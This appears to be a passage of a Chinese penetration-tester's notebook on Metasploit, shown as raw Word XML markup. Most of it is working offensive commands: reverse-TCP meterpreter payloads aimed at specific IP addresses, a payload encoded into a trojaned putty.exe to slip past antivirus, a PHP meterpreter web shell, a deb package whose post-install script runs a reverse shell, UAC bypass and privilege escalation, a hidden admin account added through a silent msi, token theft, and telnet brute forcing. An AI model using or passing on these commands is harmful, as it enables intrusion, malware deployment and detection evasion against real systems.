        <w:t>win32_bind</w:t>
      </w:r>
      <w:r w:rsidR="00AF0572">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>这个攻击载荷用于在受害机上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>开放端口</w:t>
      </w:r>
      <w:r w:rsidR="00AF0572">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，之后可以使用nc进行正向连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF0D5D" w:rsidRDefault="00D7078E" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:r w:rsidR="00CF0D5D" w:rsidRPr="003043F6">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>msfpayload</w:t>
      </w:r>
      <w:r w:rsidR="00CF0D5D">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> win32_reverse LHOST=xxxx LPORT=443 C</w:t>
      </w:r>
      <w:r w:rsidR="00525F3A">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 就会输出shellcode到终端</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003043F6" w:rsidRDefault="00CF0D5D" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00AF0572" w:rsidRPr="003043F6">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>msfpayload</w:t>
      </w:r>
      <w:r w:rsidR="00AF0572">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> win32_reverse LHOST=xxxx LPORT=443 R | ./msfencode –b </w:t>
      </w:r>
      <w:r w:rsidR="00AF0572">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“\x00x0ax0d”</w:t>
      </w:r>
      <w:r w:rsidR="008D1C83">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00525F3A">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过编码</w:t>
      </w:r>
      <w:r w:rsidR="008D1C83">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去除了坏字符)</w:t>
      </w:r>
      <w:r w:rsidR="00525F3A">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后也会输出到终端</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF0572" w:rsidRDefault="00AF0572" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00525F3A" w:rsidRPr="00AC3366" w:rsidRDefault="00525F3A" w:rsidP="00525F3A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>shellcode执行以后会</w:t>
      </w:r>
      <w:r w:rsidR="00C47244">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出整个进程，这可能导致软件崩溃。如果是基于线程的应用，那么就在msfpayload的LHOST参数后面机上EXITFUNC=thread来以线程的方式进行退出</w:t>
      </w:r>
      <w:r w:rsidR="002779C9">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，避免目标崩溃</w:t>
      </w:r>
      <w:r w:rsidR="00C47244">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00525F3A" w:rsidRDefault="00525F3A" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00525F3A" w:rsidRPr="005D5318" w:rsidRDefault="00525F3A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php脚本Meterpreter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sfpayload php/meterpreter/reverse_tcp LOHST=local_ip LPORT=xxxx R &gt; /var/www/hack.php。将该php上传到服务器，然后访问一下，就会在监听处理程序获得session。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提权：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008318BE" w:rsidRDefault="008318BE" w:rsidP="00AC4AFA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>search bypassuac</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4AFA" w:rsidRDefault="00AC4AFA" w:rsidP="00AC4AFA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exploit/windows/local/ms</w:t>
      </w:r>
      <w:r w:rsidR="00B15A98">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r w:rsidR="00B15A98">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00B15A98">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxxx 设置要提权的session_id，然后执行就会将win7 SP1提权。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4AFA" w:rsidRDefault="00AC4AFA" w:rsidP="00AC4AFA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传提权文件，可以创建另一种攻击载荷模块windows/meterpreter/reverse_tcp，然后用当前meterpreter来执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4AFA" w:rsidRDefault="00AC4AFA" w:rsidP="00AC4AFA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uploadexec</w:t>
      </w:r>
      <w:r w:rsidR="00A7661E">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00A7661E">
        <w:t>msfvenom -p windows/adduser USER=msi PASS=P@ssword123! -f msi -o /tmp/add.msi</w:t>
      </w:r>
      <w:r w:rsidR="00F76CD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F76CD2">
        <w:t>不过最好使用msiexec /quiet /qn /i c:\add.msi</w:t>
      </w:r>
      <w:r w:rsidR="00A7661E">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6324" w:rsidRDefault="001F6324" w:rsidP="001F6324">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>`注意`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>：在windows 2008 中，如果`getsystem`命令和`hashdump`命令抛出异常情况时，你需要迁移到一个以`SYSTEM`系统权限运行的进程中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6324" w:rsidRDefault="001F6324" w:rsidP="001F6324">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>有权限以后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6324" w:rsidRPr="001F6324" w:rsidRDefault="001F6324" w:rsidP="001F6324">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>net user创建一个新用户，将用户放到管理员组。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（需要由管理权限的shell）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6324" w:rsidRPr="005D09E8" w:rsidRDefault="001F6324" w:rsidP="001F6324">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>假设此处看到了一个进程，运行账户是域管理员，我们可以再第一栏找到对应的进程PID，（实际我们这里找个任意的SYSTEM账户运行的进程）steal_token pid来窃取令牌</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6324" w:rsidRPr="005D5318" w:rsidRDefault="001F6324" w:rsidP="001F6324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lastRenderedPageBreak/>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7 LPORT=4444 -f exe &gt; abc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5160F" w:rsidRDefault="00D5160F" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001F7024" w:rsidRPr="00D5160F" w:rsidRDefault="001F7024" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>不同权限下ps看到的也不一样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于是migrate的范围也不一样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sfencode是个终端命令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绕过杀毒软件的检测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sfencode 专用来清除无用代码，同时经过处理的模块会更像是一个正常的可执行文件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sfpayload windows/meterpreter/reverse_tcp LHOST=local_ip lPORT=xxx R | msfencode -x /root/putty.exe -t exe -o /root/putty2.exe -e x86/shikata_ga_nai -c 5 -k #通过管道，对攻击模块进行编码，-x 使用exe模板 -t 指定输出文件类型 shikata_ga_nai是种编码技术 -c 次数 -k确保最终文件可执行,把注入的东西放到一个新线程中执行 #msfpayload与msfencode两个通过管道连接的一大条命令可以用msfvenom来代替，而这才是kali上存在的命令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sfvenom -p  windows/meterpreter/reverse_tcp LHOST=local_ip lPORT=xxx -f exe -e x86/shikata_ga_nai -x /root/putty.exe &gt; /root/putty2.exe -k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MSF pro提供更完整的编码方案。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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书上提供两点注意：1.不要过度迭代编码，这会导致文件失去应有原本功能2.永远不要将你的恶意文件上传到在线病毒检测网站，本地断网检测后卸载，反正一定要确保文件不要传出去</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903F6D" w:rsidRPr="005D5318" w:rsidRDefault="00903F6D" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>如果想要知道有什么编码器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可以进入</w:t>
      </w:r>
      <w:r w:rsidRPr="00903F6D">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>/usr/share/metasploit-framework/modules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00CD36B6">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>encoder</w:t>
      </w:r>
      <w:r w:rsidR="00D22821">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidR="00985158">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。发现x</w:t>
      </w:r>
      <w:r w:rsidR="00985158">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>64下虽然只有两种编码器</w:t>
      </w:r>
      <w:r w:rsidR="00985158">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xor、</w:t>
      </w:r>
      <w:r w:rsidR="00985158">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>zutto_dekiru</w:t>
      </w:r>
      <w:r w:rsidR="00985158">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00B4174C">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>但是都可以</w:t>
      </w:r>
      <w:r w:rsidR="00985158">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
      <w:r w:rsidR="00985158">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="000D36C2" w:rsidP="0035367B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D36C2">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.182 lport=4443  -e x64/xor -i 5  -f msi  -o /tmp/test.msi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D36C2" w:rsidRPr="005D5318" w:rsidRDefault="000D36C2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针对deb包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deb包解压以后会有个control文件里面记录了这个软件的综合信息。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编辑安装后过程文件postint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#!/bin/sh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sudo chmod 2755 hack_file &amp;&amp; hack_file &amp; 原内容 #&amp;就是放到后台执行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hack_file 是由linux/x86/shell/reverse_tcp 创建的可执行文件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针对telnet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查看是否泄露了信息：auxiliary/scanner/telnet/telnet_version #这种方法同nc，只不过nc会显示乱码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爆破：auxiliary/scanner/telnet/telnet_login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关于Dlink网络设备telnet的爆破：auxiliary/scanner/telnet/lantronix_telnet_password #就指定了一个专用的字典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flaw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windows XP与windows Server 2003采用了相同的内核。都存在NETAPI漏洞。可以使用ms08_067。而win7没有这些个公开的445漏洞了。</w:t>
      </w:r>
      <w:r w:rsidR="00134821">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不，</w:t>
      </w:r>
      <w:r w:rsidR="00F0693D">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NSA下“方程式”</w:t>
      </w:r>
      <w:r w:rsidR="00B353A9">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组织</w:t>
      </w:r>
      <w:r w:rsidR="00F0693D">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>武器库</w:t>
      </w:r>
      <w:r w:rsidR="00134821">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>永恒之蓝连win</w:t>
      </w:r>
      <w:r w:rsidR="00134821">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>10都可以打</w:t>
      </w:r>
      <w:r w:rsidR="00134821">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。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Nvidia Mental Ray Satellite Service 7414tcp端口 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>exploit/windows/misc/nvidia_mental_ray 设置options，targets可以不用设置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针对windows xp SP3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exploit/windows/fileformat/beetel_netconfig_ini_bof（Beetel Connection Manager是一套3G无线上网卡的连接管理器，存在缓冲区溢出漏洞）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针对windows 7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exploit/windows/fileformat/beetel_netconfig_ini_bof（Beetel Connection Manager是一套3G无线上网卡的连接管理器，存在缓冲区溢出漏洞）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HTTP请求缓冲区溢出攻击：exploit/Windows/http/sws_connection_bof 通过在请求包的Connection中加入大量数据，当应用程序使用了vsprintf()去按照格式输出HTTP请求的时候造成溢出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="005D5318" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00057680" w:rsidRPr="005D5318" w:rsidRDefault="00057680" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="006024D0" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>inux:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003371DB" w:rsidRPr="005D5318" w:rsidRDefault="006024D0" w:rsidP="006024D0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006024D0">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>msfvenom -p linux/x64/meterpreter/reverse_tcp LHOSt=115.159.195.11 lport=63 -f elf  &gt;  shell.elf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">  通过这条命令产生了linux下的可执行文件，没有网络的时候执行时阻塞的，过一段时间会自动超时。有网络的时候直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="006024D0">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非法指令 (核心已转储)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。然后程序执行失败，msfconsole收到：</w:t>
      </w:r>
      <w:r w:rsidRPr="006024D0">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>[-] OpenSSL::SSL::SSLError SSL_accept SYSCALL returned=5 errno=0 state=SSLv2/v3 read client hello A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="003371DB">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>如果使用了了系统版本不对的reverse_tcp就</w:t>
      </w:r>
      <w:r w:rsidR="003371DB">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="003371DB" w:rsidRPr="003371DB">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>段错误 (核心已转储)</w:t>
      </w:r>
      <w:r w:rsidR="003371DB">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>” 并且一点都不能被执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006024D0" w:rsidRDefault="006024D0" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00811012" w:rsidRDefault="00811012" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>linux提权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811012" w:rsidRPr="0086014E" w:rsidRDefault="00811012" w:rsidP="0086014E">
      <w:r w:rsidRPr="0086014E">
        <w:t>CVE-2017-1000364</w:t>
      </w:r>
      <w:r w:rsidR="006415EC" w:rsidRPr="0086014E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A1BB6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006415EC" w:rsidRPr="0086014E">
        <w:t>CVE-2017-1000366  Linux Kernel Stack Clash</w:t>
      </w:r>
      <w:r w:rsidR="006415EC" w:rsidRPr="0086014E">
        <w:t>安全漏洞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模块编写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ruby扩展库文件在/usr/share/metasploit-framework/lib下。在msf/下面有/base与/core两个库文件的目录、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各个模块代码文件在/usr/share/metasploit-framework/modules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基础就是API和mixins类。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require 'rex/proto/http' #那么/usr/share/metasploit-framework/lib/下的rex/proto/http目录下的文件都被引入了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require 'msf/core' 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class MetasploitModule &lt; Msf::Auxiliary #定义为auxiliary模块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# Exploit mixins should be called first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include Msf::Exploit::Remote::HttpClient #引入lib/msf/core/exploit/http/client.rb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include Msf::Auxiliary::WmapScanServer #lib/msf/core/auxiliary/wmapmodule.rb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# Scanner mixin should be near last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include Msf::Auxiliary::Scanner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def initialize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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    super(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  'Name'        =&gt; 'HTTP Version Detection',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  'Description' =&gt; 'Display version information about each system.',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E3B80" w:rsidRPr="009E3B80" w:rsidRDefault="005D5318" w:rsidP="009E3B80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  </w:t>
      </w:r>
      <w:r w:rsidR="009E3B80">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E3B80" w:rsidRPr="009E3B80">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>'Author'     =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E3B80" w:rsidRPr="009E3B80" w:rsidRDefault="009E3B80" w:rsidP="009E3B80">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E3B80">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">          [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E3B80" w:rsidRPr="009E3B80" w:rsidRDefault="009E3B80" w:rsidP="009E3B80">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E3B80">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">            'Uncredited',   # vulnerability discovery</w:t>
